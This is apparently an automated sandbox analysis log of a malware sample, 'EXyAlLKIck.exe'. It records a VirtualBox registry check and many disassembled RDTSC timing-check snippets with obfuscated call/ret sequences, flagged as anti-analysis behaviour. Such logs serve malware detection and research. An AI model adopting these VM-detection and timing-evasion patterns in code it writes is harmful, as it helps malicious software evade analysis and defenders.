Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 935C73 second address: 935C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 92B7E4 second address: 92B7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 92B7EA second address: 92B80A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE5B8D9CB62h 0x0000000d jc 00007FE5B8D9CB56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 92B80A second address: 92B80E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 92B80E second address: 92B81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE5B8D9CB56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 935045 second address: 935064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FE5B8F4A752h 0x0000000b js 00007FE5B8F4A746h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 935064 second address: 935078 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE5B8D9CB5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 93537A second address: 93538A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 93538A second address: 935393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 935393 second address: 9353AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FE5B8F4A746h 0x00000014 jo 00007FE5B8F4A746h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9353AD second address: 9353C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 93551C second address: 93553B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE5B8F4A746h 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FE5B8F4A74Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 93553B second address: 93555C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE5B8D9CB68h 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 937978 second address: 937982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FE5B8F4A746h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 937982 second address: 937986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 937A07 second address: 937A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, eax 0x0000000a push 00000000h 0x0000000c mov edi, ebx 0x0000000e push 30A59EDFh 0x00000013 jmp 00007FE5B8F4A754h 0x00000018 xor dword ptr [esp], 30A59E5Fh 0x0000001f adc dx, 377Ah 0x00000024 push 00000003h 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007FE5B8F4A748h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FE5B8F4A748h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c push 00000003h 0x0000005e mov di, 44B1h 0x00000062 push 8CDCC9A9h 0x00000067 pushad 0x00000068 jnp 00007FE5B8F4A748h 0x0000006e push eax 0x0000006f push edx 0x00000070 je 00007FE5B8F4A746h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 937A9F second address: 937AF2 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 33233657h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FE5B8D9CB58h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D3603h], ecx 0x00000032 lea ebx, dword ptr [ebp+1244C89Fh] 0x00000038 mov si, 1805h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push ebx 0x00000040 jmp 00007FE5B8D9CB5Ah 0x00000045 pop ebx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 937C67 second address: 937C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A758h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 937C83 second address: 937CAE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FE5B8D9CB5Fh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007FE5B8D9CB56h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 937CAE second address: 937CB4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 957155 second address: 95715B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 95715B second address: 95717D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A754h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jo 00007FE5B8F4A746h 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 957473 second address: 957479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 957722 second address: 95773E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A758h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 958293 second address: 958299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 958299 second address: 9582B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE5B8F4A756h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9582B6 second address: 9582CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FE5B8D9CB56h 0x0000000e jnp 00007FE5B8D9CB56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9582CA second address: 9582D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 94C57B second address: 94C581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 921734 second address: 921749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A751h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 921749 second address: 92174F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 92174F second address: 921755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 921755 second address: 921759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 958C46 second address: 958C69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FE5B8F4A74Ch 0x0000000c jmp 00007FE5B8F4A74Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 958C69 second address: 958C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 958C6D second address: 958C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 924C72 second address: 924C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 924C78 second address: 924C8C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FE5B8F4A746h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 924C8C second address: 924C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 95E5D1 second address: 95E5D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96555F second address: 965563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 965563 second address: 96557D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8F4A750h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96557D second address: 965583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 965583 second address: 965589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 965589 second address: 96558F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96558F second address: 965595 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 964C6D second address: 964C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8D9CB60h 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 964E1E second address: 964E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9675A2 second address: 9675C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE5B8D9CB65h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9675C2 second address: 9675F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FE5B8F4A74Ah 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 jmp 00007FE5B8F4A74Dh 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9675F6 second address: 96761A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE5B8D9CB5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE5B8D9CB5Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96761A second address: 967620 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 967620 second address: 967626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 967A18 second address: 967A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 967AF7 second address: 967B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 967D3C second address: 967D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 968230 second address: 968234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 968234 second address: 968242 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 968242 second address: 968246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 968246 second address: 96824A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96824A second address: 968257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 968825 second address: 968884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnl 00007FE5B8F4A762h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FE5B8F4A748h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov esi, edi 0x0000002b xchg eax, ebx 0x0000002c jmp 00007FE5B8F4A74Dh 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 pushad 0x00000036 popad 0x00000037 pop eax 0x00000038 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 968D25 second address: 968D30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FE5B8D9CB56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 968D30 second address: 968DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FE5B8F4A74Bh 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FE5B8F4A748h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d jp 00007FE5B8F4A751h 0x00000033 pushad 0x00000034 jo 00007FE5B8F4A749h 0x0000003a movzx eax, dx 0x0000003d jbe 00007FE5B8F4A74Ch 0x00000043 mov dword ptr [ebp+122D1EB1h], edx 0x00000049 popad 0x0000004a xchg eax, ebx 0x0000004b jmp 00007FE5B8F4A756h 0x00000050 push eax 0x00000051 js 00007FE5B8F4A759h 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a pop eax 0x0000005b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 969765 second address: 96976A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96A961 second address: 96A97C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A757h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96AA35 second address: 96AA3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96AA3B second address: 96AA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96AA41 second address: 96AA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96C912 second address: 96C98C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jc 00007FE5B8F4A746h 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 jmp 00007FE5B8F4A757h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FE5B8F4A748h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FE5B8F4A748h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov edi, dword ptr [ebp+122D2991h] 0x00000055 push eax 0x00000056 push ecx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96C98C second address: 96C990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9708B2 second address: 9708B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 971823 second address: 971828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 970AE4 second address: 970AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 973EE9 second address: 973EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9719E5 second address: 971A07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A756h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 973EED second address: 973EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 971A07 second address: 971A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 973EF3 second address: 973F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB67h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 971A0B second address: 971A11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 974EBC second address: 974EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9750A4 second address: 9750B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE5B8F4A74Bh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 97761D second address: 977643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007FE5B8D9CB5Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FE5B8D9CB5Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9783F1 second address: 978435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 nop 0x00000007 cmc 0x00000008 push 00000000h 0x0000000a mov ebx, dword ptr [ebp+122D191Eh] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FE5B8F4A748h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov bl, ah 0x0000002e pushad 0x0000002f mov cl, B2h 0x00000031 add ecx, 2B60350Ah 0x00000037 popad 0x00000038 push eax 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jnp 00007FE5B8F4A746h 0x00000042 rdtsc
